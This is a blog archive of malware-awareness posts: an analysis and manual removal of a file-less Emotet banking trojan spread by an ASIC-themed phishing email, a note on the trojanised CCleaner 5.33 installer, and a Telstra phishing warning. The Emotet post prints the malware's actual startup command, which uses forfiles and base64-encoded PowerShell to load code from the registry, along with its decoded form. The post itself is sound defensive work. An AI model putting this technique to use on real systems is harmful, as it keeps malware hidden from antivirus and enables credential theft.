Category Archives: malware

Analyzing File-less Banking Malware

This malware appears to have originated from an email claiming to be ASIC Messaging Service. It advises the user that their business name is due for renewal . The link within the email does not take the user to the ASIC website, but instead links to a website for a community newspaper.  This website appears to have at some stage been compromised. A page had been added that automatically forwards the user to another malicious website. This is where malware was downloaded onto the clients PC.

For those who are interested in the more technical details, I wont link directly to the pages, but the Virus Total page for the original link can be found here.  The link in which it redirects to is no longer available but the Virus Total page can be viewed here.  The second link has been marked by a member of the Virus Total community as ASIC phising/malware.

I was investigating the Malware infection for a client after the fact. At the time the client clicked the link (browser history verified link was clicked) a java script file appears to have been downloaded onto the machine. Virus TotalHybrid Analysis links.

It is easy to blame the victim in these cases, but some phishing emails have become so well put together that anyone could fall for it.

The client had noticed after this time a command prompt window would flashed up on the screen upon Windows start up.

There was also a line at the bottom that I missed in the screenshot that read:

ERROR: Access is denied for “C:\WINDOWS\System32\winevt\”

At this time the clients bank contacted them to advice that their PC was infected with a Banking Trojan.

Removing File-less Banking Malware

I had no luck removing the malware with KVRT and had to proceed with a manual approach. ESET, my go to AV, did not detect the malware, nor did Windows Defender.

KVRT showed the infection as:

MEM:Trojan-Banker.multi.Emotet.gen.

Upon inspecting the startup, a command that utilizes a trusted Windows executable file, was set to run each bootup.

The command was:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA”

When the text is decoded the command is:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec iex (gp ‘HKCU:\\Identities\{464AEDF5-05C7-B661-1712-A9597829BE4D}’).T”

Base64 text can be decoded using Certutil found in C:\WINDOWS\System32\

i.e. certutil.exe -decode encoded.txt decoded.txt

Base64 can also be decoded using an online service such as https://www.base64decode.org/.

Forfiles has been set to run each start up and load the malware from the registry into the memory. This avoids it writing to disk and helps to prevent detection.

While I didn’t analyse exactly what EMOTET was doing, banking malware is designed to steal login credentials. The password is captured when you log into your bank and is sent back to a server that the attacker controls. Often with banking malware screenshots are taken to allow the attacker to capture other information such as funds available and account numbers.

Protecting yourself

Antivirus is not the magical safe guard it is often made out to be. It is still a great idea to have some kind of antivirus running on your device, but there are other task you can do to protect yourself or your business.

Train against phishing – It is simple for most home users; don’t click links, and avoid attachments from people you don’t know. But for business users, it is a littler harder. Many staff members jobs involve clicking links and opening attachment. This is why user training is important. Take a Phishing IQ Test.

Remove administrator privileges – I have covered this previously. Taking away administrator privileges can often limit what foothold malware can gain on your device.

Keep your software up to date – Some malware will exploit known vulnerabilities in your operating system or software. Windows users can install updates for the Operating System via Windows Updates (Windows Key + R, type control update, press enter, and click Check for updates). Software can be easily updated using Patch my PC.

Ask for help – If you receive an email that does not seem right, call a trusted friend or ask a colleague (If your business has in house IT staff start here). Sometimes talking out loud will help you tell if something is genuine or not.

Read our other articles and share will your friends – I have covered many other tech tips topics. Read them and share them with your friends.

CCleaner hacked and bundled with malware

CCleaner is a popular cleaning program that is often installed to help clean up a slow PC. It boasts that it “protects your privacy and makes your computer faster and more secure”.

A recent version of CCleaner, version 5.33, had been modified to include malware. Attackers had managed to compromise a server from which users download CCleaner. They were then able to add malware to the setup file and resign it with a legitimate certificate. This helped the malware to bypass any protections users had in place that might have otherwise stopped the installation.

The malware only affects 32-bit systems, and is removed with the latest update of CCleaner.

The malware that is included is known as Floxif. It is a Trojan that allows the attacker to run additional executable files on your PC as well as collect information regarding your PC.

If you are a user of CCleaner it is highly recommend installing the latest version from the Piriform website.

Telstra Phishing Email

Be wary of a Telstra phishing email doing the rounds. The email advises the recipient that their latest Telstra bill is available to download. Upon clicking the link you will be presented with a zip file containing a malicious javascript file. This javascript file, when run, will download a Trojan onto your PC.  A Trojan allows an attacker to remotely access your PC. This allows an attacker to possibly view what you are doing, steal passwords, or install other malware, such as ransomware onto your PC.